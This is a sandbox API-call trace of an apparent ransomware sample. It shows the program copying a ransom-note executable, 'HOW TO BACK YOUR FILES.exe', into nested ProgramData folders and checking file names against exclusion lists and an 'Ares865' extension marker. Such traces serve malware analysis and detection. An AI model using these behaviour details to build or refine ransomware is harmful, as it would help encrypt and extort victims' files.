lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.508] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.508] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.508] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0091.508] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x330fc8 | out: hHeap=0x2b0000) returned 1 [0091.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0091.508] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 207 [0091.508] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.508] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.509] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.509] GetLastError () returned 0x0 [0091.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.509] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.509] CloseHandle (hObject=0x120) returned 1 [0091.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.509] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.509] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.510] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.510] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.510] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.510] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.510] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.510] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.510] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.510] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.510] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.510] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.510] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="aoldtz.exe") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2=".") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="..") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="windows") returned -1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="bootmgr") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="temp") returned -1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="pagefile.sys") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="boot") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="ids.txt") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="ntuser.dat") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="perflogs") returned 1 [0091.510] lstrcmpiW (lpString1="Replicate", lpString2="MSBuild") returned 1 [0091.510] lstrlenW (lpString="Replicate") returned 9 [0091.510] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*") returned 209 [0091.510] lstrcpyW (in: lpString1=0x2cce5a0, lpString2="Replicate" | out: lpString1="Replicate") returned="Replicate" [0091.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0091.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1b4) returned 0x2d6cf0 [0091.510] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0091.510] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0091.510] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.510] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0091.510] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0091.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0091.511] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 217 [0091.511] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.511] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.511] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.511] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.512] GetLastError () returned 0x0 [0091.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.512] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.512] CloseHandle (hObject=0x120) returned 1 [0091.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.512] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.512] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.512] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.512] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.512] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.512] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.512] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.512] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.512] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.512] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.512] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.512] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.512] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d007520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="aoldtz.exe") returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2=".") returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="..") returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="windows") returned -1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="bootmgr") returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="temp") returned -1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="pagefile.sys") returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="boot") returned 1 [0091.512] lstrcmpiW (lpString1="Security", lpString2="ids.txt") returned 1 [0091.513] lstrcmpiW (lpString1="Security", lpString2="ntuser.dat") returned 1 [0091.513] lstrcmpiW (lpString1="Security", lpString2="perflogs") returned 1 [0091.513] lstrcmpiW (lpString1="Security", lpString2="MSBuild") returned 1 [0091.513] lstrlenW (lpString="Security") returned 8 [0091.513] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*") returned 219 [0091.513] lstrcpyW (in: lpString1=0x2cce5b4, lpString2="Security" | out: lpString1="Security") returned="Security" [0091.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0091.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c6) returned 0x322fc8 [0091.513] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0091.513] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d007520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0091.513] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.513] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0091.513] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x322fc8 | out: hHeap=0x2b0000) returned 1 [0091.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0091.513] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 226 [0091.513] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.513] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.513] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.514] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.514] GetLastError () returned 0x0 [0091.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.514] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.514] CloseHandle (hObject=0x120) returned 1 [0091.514] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.514] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.514] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d007520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.514] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.514] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.514] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.514] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d007520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.514] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.514] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.515] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.515] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.515] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="aoldtz.exe") returned 1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2=".") returned 1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="..") returned 1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="windows") returned -1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="bootmgr") returned 1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="temp") returned -1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="pagefile.sys") returned -1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="boot") returned 1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="ids.txt") returned -1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="ntuser.dat") returned -1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="perflogs") returned -1 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2="MSBuild") returned -1 [0091.515] lstrlenW (lpString="directories.acrodata") returned 20 [0091.515] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*") returned 228 [0091.515] lstrcpyW (in: lpString1=0x2cce5c6, lpString2="directories.acrodata" | out: lpString1="directories.acrodata") returned="directories.acrodata" [0091.515] lstrlenW (lpString="directories.acrodata") returned 20 [0091.515] lstrlenW (lpString="Ares865") returned 7 [0091.515] lstrcmpiW (lpString1="crodata", lpString2="Ares865") returned 1 [0091.515] lstrlenW (lpString=".dll") returned 4 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2=".dll") returned 1 [0091.515] lstrlenW (lpString=".lnk") returned 4 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2=".lnk") returned 1 [0091.515] lstrlenW (lpString=".ini") returned 4 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2=".ini") returned 1 [0091.515] lstrlenW (lpString=".sys") returned 4 [0091.515] lstrcmpiW (lpString1="directories.acrodata", lpString2=".sys") returned 1 [0091.515] lstrlenW (lpString="directories.acrodata") returned 20 [0091.515] lstrlenW (lpString="bak") returned 3 [0091.515] lstrcmpiW (lpString1="ata", lpString2="bak") returned -1 